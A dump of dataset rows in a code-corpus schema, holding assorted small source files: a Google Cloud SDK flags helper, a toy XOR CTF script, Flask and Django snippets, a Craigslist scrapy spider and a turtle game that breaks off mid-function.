blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3b7bce198346d439703494bd74c2c46bef4a5270 | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/lib/googlecloudsdk/command_lib/deployment_manager/flags.py | d4cbf34227cc379f368deb83d40bbb690841c6b0 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 4,189 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper methods for configuring deployment manager command flags."""
from googlecloudsdk.api_lib.deployment_manager import dm_api_util
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.command_lib.util.apis import arg_utils
RESOURCES_AND_OUTPUTS_FORMAT = """
table(
resources:format='table(
name,
type:wrap,
update.state.yesno(no="COMPLETED"),
update.error.errors.group(code),
update.intent)',
outputs:format='table(
name:label=OUTPUTS,
finalValue:label=VALUE)'
)
"""
OPERATION_FORMAT = """
table(
name,
operationType:label=TYPE,
status,
targetLink.basename():label=TARGET,
error.errors.group(code),
warnings.group(code)
)
"""
DEPLOYMENT_FORMAT = """
default(
name, id, description, fingerprint,insertTime, manifest.basename(),
labels, operation.operationType, operation.progress,
operation.status, operation.user, operation.endTime, operation.startTime,
operation.error, operation.warnings, update)
"""
_DELETE_FLAG_KWARGS = {
'help_str': ('Delete policy for resources that will change as part of '
'an update or delete. `delete` deletes the resource while '
'`abandon` just removes the resource reference from the '
'deployment.'),
'default': 'delete',
'name': '--delete-policy'
}
def GetDeleteFlagEnumMap(policy_enum):
return arg_utils.ChoiceEnumMapper(
_DELETE_FLAG_KWARGS['name'],
policy_enum,
help_str=_DELETE_FLAG_KWARGS['help_str'],
default=_DELETE_FLAG_KWARGS['default'])
def AddDeploymentNameFlag(parser):
"""Add properties flag."""
parser.add_argument('deployment_name', help='Deployment name.')
def AddConfigFlags(parser):
"""Add flags for different types of configs."""
parser.add_argument(
'--config',
help='Filename of a top-level yaml config that specifies '
'resources to deploy.')
parser.add_argument(
'--template',
help='Filename of a top-level jinja or python config template.')
parser.add_argument(
'--composite-type',
help='Name of a composite type to deploy.')
def AddPropertiesFlag(parser):
"""Add properties flag."""
parser.add_argument(
'--properties',
help='A comma separated, key:value, map '
'to be used when deploying a template file or composite type directly.',
type=arg_parsers.ArgDict(operators=dm_api_util.NewParserDict()),
dest='properties')
def AddAsyncFlag(parser):
"""Add the async argument."""
parser.add_argument(
'--async',
help='Return immediately and print information about the Operation in '
'progress rather than waiting for the Operation to complete. '
'(default=False)',
dest='async',
default=False,
action='store_true')
def AddFingerprintFlag(parser):
"""Add the fingerprint argument."""
parser.add_argument(
'--fingerprint',
help=('The fingerprint to use in requests to modify a deployment. If not '
'specified, a get deployment request will be made to fetch the '
'latest fingerprint. A fingerprint is a randomly generated value '
'that is part of the update, stop, and cancel-preview request to '
'perform optimistic locking. It is initially generated by '
'Deployment Manager and changes after every request to modify '
'data. The latest fingerprint is printed when deployment data is '
'modified.'),
dest='fingerprint')
| [
"saneetk@packtpub.com"
] | saneetk@packtpub.com |
4bbf5176a2819bc143b1ee92a6c2f72dd3b570b1 | d6bf3302b826127a9d2f08bbd05947cbb9d342c6 | /symmetry_1/encrypt.py | b2978c73f33e432efc322710c5513fbf23979a6f | [] | no_license | velocitystorm/ctf-crypto-tasks | 03add82d00bbf28f45955e153d4c5585e1a2647a | 50a2ea2019bc7798a85d5bcbb6e04ebd91f9a51b | refs/heads/master | 2021-01-19T07:10:34.714655 | 2014-04-16T19:57:08 | 2014-04-16T19:57:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | #!/usr/bin/env python3
def encrypt(data, key):
return bytes([octet ^ key for octet in data])
print('Enter a key: ')
key = input()
key = ord(key[0])
print('Enter a message: ')
message = input().strip().encode('ascii') # convert from str to bytes
encrypted = encrypt(message, key)
fout = open('message.encrypted', 'wb')
fout.write(encrypted)
fout.close()
| [
"cxielamiko@gmail.com"
] | cxielamiko@gmail.com |
b3d6568aadebae72d49ae2424c19d1cd3db5d59f | c46fba793dc4c2eb4aa7886ca1b29d2c444dddb9 | /tests/test_config_validators.py | b18d531cd0c58283a79c08ca805a7ab26ac0a973 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | digideskio/vodka | 7ffcc408df3571db9bb143674db51554ddd34674 | 86a4efa0e1666902771459c8727680888026eac5 | refs/heads/master | 2021-01-12T17:49:58.576348 | 2016-10-11T09:36:40 | 2016-10-11T09:36:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | import unittest
import vodka.config.validators
class TestConfigValidators(unittest.TestCase):
def test_path_validator(self):
b,d = vodka.config.validators.path(__file__)
self.assertEqual(b, True)
def test_host_validator(self):
b,d = vodka.config.validators.host("host:1")
self.assertEqual(b, True)
b,d = vodka.config.validators.host("host")
self.assertEqual(b, False)
b,d = vodka.config.validators.host("host:b")
self.assertEqual(b, False)
| [
"stefan@20c.com"
] | stefan@20c.com |
cd7c4627c1549a2026c52188d64d165e6a522a59 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_inspirational.py | 99cfc99ffa1a858152258d1937a20cad880aa545 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py |
#calss header
class _INSPIRATIONAL():
def __init__(self,):
self.name = "INSPIRATIONAL"
self.definitions = [u'making you feel full of hope or encouraged: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
6856f767fdb17749139555eee6cacdc1dc9e16fe | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/pronouns/_one.py | f591a8a6acc6b3fb2f2a28d9dd49ebe3efe3e975 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 645 | py |
#calss header
class _ONE():
def __init__(self,):
self.name = "ONE"
self.definitions = [u'used to refer to a particular thing or person within a group or range of things or people that are possible or available: ', u'to never do something: ', u'to like something very much: ', u'used to talk about one person or thing compared with other similar or related people or things: ', u'any person, but not a particular person: ', u'the person speaking or writing: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'pronouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
25f3d296f6e6657fadb469b39bcae1f882399891 | 8fd11d010b550144c62e2cf0ead5a89433ba56e9 | /bin/switch_kerasbackend | 24a63df2ae7d764d28adf5073bf310ea7ddd30ab | [] | no_license | Shaar68/PyShortTextCategorization | 3d47d4fc1996eab61fc8cf2ce8d37c0ef9188931 | 189a57da34c52aab1dbd8dcf4145c2dbb120f5af | refs/heads/master | 2021-04-15T18:46:47.014156 | 2017-06-16T20:59:15 | 2017-06-16T20:59:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | #!/usr/bin/env python
# Secret code. Welcome for those who find this code.
# argument parsing
import argparse
def getargparser():
parser = argparse.ArgumentParser(description='Switch Keras backend')
parser.add_argument('backend', help="Backend ('theano' or 'tensorflow')")
return parser
parser = getargparser()
args = parser.parse_args()
import os
import json
homedir = os.path.expanduser('~')
kerasconfigfile = os.path.join(homedir, '.keras/keras.json')
if __name__ == '__main__':
kerasconfig = json.load(open(kerasconfigfile, 'r'))
kerasconfig['backend'] = args.backend
json.dump(kerasconfig, open(kerasconfigfile, 'w'))
print 'Keras backend set to ', args.backend | [
"stephenhky@yahoo.com.hk"
] | stephenhky@yahoo.com.hk | |
85904490e01b299c684985a2b352b9b0ad3e7072 | 8f588e8c1502d468689732969c744ccca2055106 | /Python/Programmers/Lv2/n진수게임.py | cf3b9d5062511cb56acb7c560b8dec42a700682d | [] | no_license | 5d5ng/ForCodingTest | 96751c969c2f64d547fe28fa3e14c47c2943947b | 3742c1b38bf00dd4768a9c7ea67eca68844b4a14 | refs/heads/master | 2023-01-04T14:18:40.874764 | 2020-11-02T06:15:05 | 2020-11-02T06:15:05 | 222,054,009 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | def solution(n,t,m,p):
answer = replace(n,m*t)
res = ""
for i in range(p-1,len(answer),m):
res+=answer[i]
if len(res)==t:return res
def replace(n,size): # size까지
num = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']
lst = ['0','1']
start = 2
while(len(lst)<size):
target = start
temp = []
while(target>0):
tnum = target % n
target = int(target/n)
temp.append(num[tnum])
temp = temp[::-1]
for i in temp:
lst.append(i)
start+=1
return lst
n = 16
size = 16
print(solution(2,4,2,1))
# num = 10
# l = []
# while(num>0):
# temp = num%2
# num = int(num/2)
# l.append(temp)
# print(l)
| [
"deo1915@gmail.com"
] | deo1915@gmail.com |
46fd526660dbfc019853fabd462a7d73dbe53b03 | 07c75f8717683b9c84864c446a460681150fb6a9 | /3.Flask_cursor/days01快速入门/demo01.py | 329e98f279655b1c6e44cf5da068fc75cba4249c | [] | no_license | laomu/py_1709 | 987d9307d9025001bd4386381899eb3778f9ccd6 | 80630e6ac3ed348a2a6445e90754bb6198cfe65a | refs/heads/master | 2021-05-11T09:56:45.382526 | 2018-01-19T07:08:00 | 2018-01-19T07:08:00 | 118,088,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 858 | py | '''
Flask继承了Django和Tornado的部分优点
在高并发处理上,类似于Django通过多线程的方式实现
在编程处理上,类似于Tornado通过手工编码的方式实现web application
'''
# 引入需要的模块
from flask import Flask # 核心处理模块
# 通过当前文件构建一个app应用 ~~ 当前文件就是 web app程序的入口
app = Flask(__name__)
# 定义视图处理函数~路由+视图函数->加载到 app 中
@app.route("/") # 访问路由
def index(): # 绑定的视图函数
return "<h1>hello flask!</h1>"
@app.route("/login")
def login():
return "<h1>member login!</h1>"
@app.route("/register")
def regist():
return "<h1>member register!</h1>"
if __name__ == "__main__":
# 运行程序
app.run()
"""
路由和视图处理:
Djnago中:
Tornado中:
Flask中:
""" | [
"1007821300@qq.com"
] | 1007821300@qq.com |
b887636efed3ae71e7e0660b52fbac0e6d3d6873 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/65/usersdata/219/38632/submittedfiles/investimento.py | 3a87d2cb906049101a01605e976893fc0fa25aca | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # -*- coding: utf-8 -*-
from __future__ import division
#COMECE SEU CODIGO AQUI
deposito=float(input('Digite o deposito:'))
taxa=float(input('Digite a taxa:'))
investimento=float(input('Digite o investimento:'))
mês=1
while mes <= 10:
investimento=investimento+taxa*investimento
print('%d/%d/%d/%d/%d/%d/%d/%d/%d/%d') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
7ad96ac8ed482fde22e8b199d879255e63f17260 | b1d92172726262fc89f9a0c4a9e4888ebc91009e | /leetcode/easy/Interleave.py | 1c493d3f57046482b48177ea177b563573da49bb | [] | no_license | SuperMartinYang/learning_algorithm | 0c5807be26ef0b7a1fe4e09832f3ce640cd3172b | e16702d2b3ec4e5054baad56f4320bc3b31676ad | refs/heads/master | 2021-06-27T14:00:18.920903 | 2019-05-05T23:25:29 | 2019-05-05T23:25:29 | 109,798,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | def isInterleave(word1, word2, word3):
'''
word1= 'asdf'
word2 = 'sadfa'
word3 = 'assaddffa'
:param word1: str
:param word2: str
:param word3: str
:return: bool
'''
if word3 == '':
if word1 == word2 == '':
return True
else:
return False
if word1[0] == word3[0]:
return isInterleave(word1[1:], word2, word3[1:])
elif word2[0] == word3[0]:
return isInterleave(word1, word2[1:], word3[1:])
else:
return False
| [
"shy58@pitt.edu"
] | shy58@pitt.edu |
f1409870e136171b9f35c5745ceba8d628968f1d | b27b26462524984951bfbab9250abd145ecfd4c8 | /Demoing/stage_two/hawaii/craigslist_sample/craigslist_sample/spiders/craigslist_spider.py | 4a8ff1b9c951d8f06a9a0049a23b24525323045a | [] | no_license | afcarl/fastTraffickingGrab | cb813d066f1f69f359598e0b55e632dafd273c89 | 9ff274cb7c9b6c7b60d1436c209b2bfc5907267d | refs/heads/master | 2020-03-26T06:21:21.404931 | 2014-08-16T12:38:29 | 2014-08-16T12:38:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,648 | py |
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from craigslist_sample.items import CraigslistSampleItem
class CraigslistSpider(CrawlSpider):
name = "craigslist"
allowed_domains = ["craigslist.org"]
start_urls = [
"http://honolulu.craigslist.org",
"http://honolulu.craigslist.org/cas/",
"http://honolulu.craigslist.org/cas/index100.html",
"http://honolulu.craigslist.org/cas/index200.html",
"http://honolulu.craigslist.org/cas/index300.html",
"http://honolulu.craigslist.org/cas/index400.html",
"http://honolulu.craigslist.org/cas/index500.html",
"http://honolulu.craigslist.org/cas/index600.html",
"http://honolulu.craigslist.org/cas/index700.html",
"http://honolulu.craigslist.org/cas/index800.html",
"http://honolulu.craigslist.org/cas/index900.html",
"http://honolulu.craigslist.org/cas/index1000.html",
"http://honolulu.craigslist.org/cas/index1100.html",
"http://honolulu.craigslist.org/cas/index1200.html",
"http://honolulu.craigslist.org/cas/index1300.html",
"http://honolulu.craigslist.org/cas/index1400.html",
"http://honolulu.craigslist.org/cas/index1500.html",
"http://honolulu.craigslist.org/cas/index1600.html",
"http://honolulu.craigslist.org/cas/index1700.html",
"http://honolulu.craigslist.org/cas/index1800.html",
"http://honolulu.craigslist.org/cas/index1900.html",
"http://honolulu.craigslist.org/cas/index2000.html",
"http://honolulu.craigslist.org/cas/index2100.html",
"http://honolulu.craigslist.org/cas/index2200.html",
"http://honolulu.craigslist.org/cas/index2300.html",
"http://honolulu.craigslist.org/cas/index2400.html",
"http://honolulu.craigslist.org/cas/index2500.html",
"http://honolulu.craigslist.org/cas/index2600.html",
"http://honolulu.craigslist.org/cas/index2700.html",
"http://honolulu.craigslist.org/cas/index2800.html",
"http://honolulu.craigslist.org/cas/index2900.html",
"http://honolulu.craigslist.org/cas/index3000.html",
"http://honolulu.craigslist.org/cas/index3100.html",
"http://honolulu.craigslist.org/cas/index3200.html",
"http://honolulu.craigslist.org/cas/index3300.html",
"http://honolulu.craigslist.org/cas/index3400.html",
"http://honolulu.craigslist.org/cas/index3500.html",
"http://honolulu.craigslist.org/cas/index3600.html",
"http://honolulu.craigslist.org/cas/index3700.html",
"http://honolulu.craigslist.org/cas/index3800.html",
"http://honolulu.craigslist.org/cas/index3900.html",
"http://honolulu.craigslist.org/cas/index4000.html",
"http://honolulu.craigslist.org/cas/index4100.html",
"http://honolulu.craigslist.org/cas/index4200.html",
"http://honolulu.craigslist.org/cas/index4300.html",
"http://honolulu.craigslist.org/cas/index4400.html",
"http://honolulu.craigslist.org/cas/index4500.html",
"http://honolulu.craigslist.org/cas/index4600.html",
"http://honolulu.craigslist.org/cas/index4700.html",
"http://honolulu.craigslist.org/cas/index4800.html",
"http://honolulu.craigslist.org/cas/index4900.html",
"http://honolulu.craigslist.org/cas/index5000.html",
"http://honolulu.craigslist.org/cas/index5100.html",
"http://honolulu.craigslist.org/cas/index5200.html",
"http://honolulu.craigslist.org/cas/index5300.html",
"http://honolulu.craigslist.org/cas/index5400.html",
"http://honolulu.craigslist.org/cas/index5500.html",
"http://honolulu.craigslist.org/cas/index5600.html",
"http://honolulu.craigslist.org/cas/index5700.html",
"http://honolulu.craigslist.org/cas/index5800.html",
"http://honolulu.craigslist.org/cas/index5900.html",
"http://honolulu.craigslist.org/cas/index6000.html",
"http://honolulu.craigslist.org/cas/index6100.html",
"http://honolulu.craigslist.org/cas/index6200.html",
"http://honolulu.craigslist.org/cas/index6300.html",
"http://honolulu.craigslist.org/cas/index6400.html",
"http://honolulu.craigslist.org/cas/index6500.html",
"http://honolulu.craigslist.org/cas/index6600.html",
"http://honolulu.craigslist.org/cas/index6700.html",
"http://honolulu.craigslist.org/cas/index6800.html",
"http://honolulu.craigslist.org/cas/index6900.html",
"http://honolulu.craigslist.org/cas/index7000.html",
"http://honolulu.craigslist.org/cas/index7100.html",
"http://honolulu.craigslist.org/cas/index7200.html",
"http://honolulu.craigslist.org/cas/index7300.html",
"http://honolulu.craigslist.org/cas/index7400.html",
"http://honolulu.craigslist.org/cas/index7500.html",
"http://honolulu.craigslist.org/cas/index7600.html",
"http://honolulu.craigslist.org/cas/index7700.html",
"http://honolulu.craigslist.org/cas/index7800.html",
"http://honolulu.craigslist.org/cas/index7900.html",
"http://honolulu.craigslist.org/cas/index8000.html",
"http://honolulu.craigslist.org/cas/index8100.html",
"http://honolulu.craigslist.org/cas/index8200.html",
"http://honolulu.craigslist.org/cas/index8300.html",
"http://honolulu.craigslist.org/cas/index8400.html",
"http://honolulu.craigslist.org/cas/index8500.html",
"http://honolulu.craigslist.org/cas/index8600.html",
"http://honolulu.craigslist.org/cas/index8700.html",
"http://honolulu.craigslist.org/cas/index8800.html",
"http://honolulu.craigslist.org/cas/index8900.html",
"http://honolulu.craigslist.org/cas/index9000.html",
"http://honolulu.craigslist.org/cas/index9100.html",
"http://honolulu.craigslist.org/cas/index9200.html",
"http://honolulu.craigslist.org/cas/index9300.html",
"http://honolulu.craigslist.org/cas/index9400.html",
"http://honolulu.craigslist.org/cas/index9500.html",
"http://honolulu.craigslist.org/cas/index9600.html",
"http://honolulu.craigslist.org/cas/index9700.html",
"http://honolulu.craigslist.org/cas/index9800.html",
"http://honolulu.craigslist.org/cas/index9900.html"
]
rules = (Rule(SgmlLinkExtractor(allow=(),restrict_xpaths=('//a')), callback="parse", follow= True),)
def parse(self, response):
hxs = HtmlXPathSelector(response)
titles = hxs.select("//span[@class='pl']")
date_info = hxs.select("//h4[@class='ban']/span[@class='bantext']/text()")
items = []
file_to = open("things.txt","a")
file_to.write(response.body)
for titles in titles:
item = CraigslistSampleItem()
item ["title"] = titles.select("a/text()").extract()
item ["link"] = titles.select("a/@href").extract()
item ["date"] = date_info.extract()
items.append(item)
return items
| [
"ericschles@gmail.com"
] | ericschles@gmail.com |
e1e57f455f8052ec8a259620b247dbb9611debba | 71d4fafdf7261a7da96404f294feed13f6c771a0 | /mainwebsiteenv/bin/python-config | 34a5b39d2ea832da34c02d5012684422e32075af | [] | no_license | avravikiran/mainwebsite | 53f80108caf6fb536ba598967d417395aa2d9604 | 65bb5e85618aed89bfc1ee2719bd86d0ba0c8acd | refs/heads/master | 2021-09-17T02:26:09.689217 | 2018-06-26T16:09:57 | 2018-06-26T16:09:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,434 | #!/home/kiran/mainwebsite/mainwebsiteenv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"me15btech11039@iith.ac.in.com"
] | me15btech11039@iith.ac.in.com | |
4b5c8b490bfaa7cd67402657c4020db410bde51b | fb7b6a0d43c524761f5251273d14f317e779c5f0 | /rxbp/observables/fromiteratorobservable.py | bd223651a12680dd7c80c263f7fb1e32727ef164 | [
"Apache-2.0"
] | permissive | MichaelSchneeberger/rxbackpressure | e7396b958d13e20377375f4b45a91a01f600595a | 470d36f729ef9dc001d0099cee45603d9c7f86a3 | refs/heads/master | 2022-08-26T10:12:05.164182 | 2022-08-21T12:21:15 | 2022-08-21T12:21:15 | 109,152,799 | 32 | 1 | Apache-2.0 | 2021-03-09T12:47:23 | 2017-11-01T16:05:20 | Python | UTF-8 | Python | false | false | 4,732 | py | from typing import Iterator, Any, Optional
from rx.disposable import Disposable, BooleanDisposable, CompositeDisposable
from rxbp.acknowledgement.continueack import ContinueAck
from rxbp.acknowledgement.operators.observeon import _observe_on
from rxbp.acknowledgement.single import Single
from rxbp.acknowledgement.stopack import StopAck
from rxbp.mixins.executionmodelmixin import ExecutionModelMixin
from rxbp.observable import Observable
from rxbp.observerinfo import ObserverInfo
from rxbp.scheduler import Scheduler
class FromIteratorObservable(Observable):
def __init__(
self,
iterator: Iterator[Iterator[Any]],
scheduler: Scheduler,
subscribe_scheduler: Scheduler,
on_finish: Disposable = Disposable(),
):
super().__init__()
self.iterator = iterator
self.scheduler = scheduler
self.subscribe_scheduler = subscribe_scheduler
self.on_finish = on_finish
def observe(self, observer_info: ObserverInfo):
observer_info = observer_info.observer
d1 = BooleanDisposable()
def action(_, __):
try:
item = next(self.iterator)
has_next = True
except StopIteration:
has_next = False
except Exception as e:
# stream errors
observer_info.on_error(e)
return Disposable()
if not has_next:
observer_info.on_completed()
else:
# start sending items
self.fast_loop(item, observer_info, self.scheduler, d1, self.scheduler.get_execution_model(),
sync_index=0)
d2 = self.subscribe_scheduler.schedule(action)
return CompositeDisposable(d1, d2)
def trigger_cancel(self, scheduler: Scheduler):
try:
self.on_finish.dispose()
except Exception as e:
scheduler.report_failure(e)
def reschedule(self, ack, next_item, observer, scheduler: Scheduler, disposable, em: ExecutionModelMixin):
class ResultSingle(Single):
def on_next(_, next):
if isinstance(next, ContinueAck):
try:
self.fast_loop(next_item, observer, scheduler, disposable, em, sync_index=0)
except Exception as e:
self.trigger_cancel(scheduler)
scheduler.report_failure(e)
else:
self.trigger_cancel(scheduler)
def on_error(_, err):
self.trigger_cancel(scheduler)
scheduler.report_failure(err)
_observe_on(source=ack, scheduler=scheduler).subscribe(ResultSingle())
# ack.subscribe(ResultSingle())
def fast_loop(self, current_item, observer, scheduler: Scheduler,
disposable: BooleanDisposable, em: ExecutionModelMixin, sync_index: int):
while True:
# try:
ack = observer.on_next(current_item)
# for mypy to type check correctly
next_item: Optional[Any]
try:
next_item = next(self.iterator)
has_next = True
except StopIteration:
has_next = False
next_item = None
except Exception as e:
# stream errors == True
self.trigger_cancel(scheduler)
if not disposable.is_disposed:
observer.on_error(e)
else:
scheduler.report_failure(e)
has_next = False
next_item = None
if not has_next:
try:
self.on_finish.dispose()
except Exception as e:
observer.on_error(e)
else:
observer.on_completed()
break
else:
if isinstance(ack, ContinueAck):
next_index = em.next_frame_index(sync_index)
elif isinstance(ack, StopAck):
next_index = -1
else:
next_index = 0
if next_index > 0:
current_item = next_item
sync_index = next_index
elif next_index == 0 and not disposable.is_disposed:
self.reschedule(ack, next_item, observer, scheduler, disposable, em)
break
else:
self.trigger_cancel(scheduler)
break
# except Exception:
# raise Exception('fatal error')
| [
"michael.schneeb@gmail.com"
] | michael.schneeb@gmail.com |
4355cddb4a6bf72e8a7bb7c5cbf43fd7937c39d7 | 52c705205b243016c90757ed9d7332840277ce11 | /atracoes/migrations/0003_atracao_observacoes.py | ab7a3c8d0152bbe7326dde69447851f31aebcec9 | [] | no_license | lssdeveloper/pontos_turisticos | eb943549cb18561205818dcfb8c624bba32c7100 | 24852ca1b35795db876219a7a3439f496866d3d5 | refs/heads/main | 2023-04-03T10:24:22.000414 | 2021-04-15T20:13:02 | 2021-04-15T20:13:02 | 355,312,899 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | # Generated by Django 3.1.7 on 2021-04-15 17:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('atracoes', '0002_atracao_foto'),
]
operations = [
migrations.AddField(
model_name='atracao',
name='observacoes',
field=models.CharField(blank=True, max_length=50, null=True),
),
]
| [
"leandro.serra.10@gmail.com"
] | leandro.serra.10@gmail.com |
d9a18dc79e3f78292de7283cc85150a6221a6818 | 07841826ed64a7c6a21b79728f73748ac70dbbc1 | /1.2.2.py | 32cd6c3c38b89f023dcf0a64b287b3421998c263 | [] | no_license | riley-csp-2019-20/1-2-2-catch-a-turtle-leaderboard-illegal-Loli | 772859d28ae3b7b8d003febd1c57fd79b55907dc | 8648a790e039044b3ce722a53a8ec42e45d42488 | refs/heads/master | 2020-09-06T01:58:27.621209 | 2019-12-12T16:11:22 | 2019-12-12T16:11:22 | 220,279,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,622 | py | # a121_catch_a_turtle.py
#-----import statements-----
import turtle as trtl
import random
import leaderboard as lb
#-----game configuration----
shape = "square"
size = 2
color = "brown"
score = 0
font_setup = ("Arial", 20, "normal")
timer = 10
counter_interval = 1000 #1000 represents 1 second
timer_up = False
#leaderboard variables
leaderboard_file_name = "a122_leaderboard.txt"
leader_names_list = []
leader_scores_list = []
player_name = input("please enter name")
#-----initialize turtle-----
Amy = trtl.Turtle(shape = shape)
Amy.color(color)
Amy.shapesize(size)
Amy.speed(0)
ore = trtl.Turtle()
ore.penup()
ore.goto(-370,270)
font = ("comic_sans", 30, "bold")
# ore.write("text")
ore.ht()
counter = trtl.Turtle()
#-----game functions--------
def turtle_clicked(x,y):
# print("Amy was clicked")
change_position()
Amy.st()
score_counter()
def change_position():
Amy.penup()
Amy.ht()
new_xpos = random.randint(-400,400)
new_ypos = random.randint(-300,300)
Amy.goto(new_xpos, new_ypos)
def score_counter():
global score
score += 1
# print(score)
ore.clear()
ore.write(score, font =font)
def countdown():
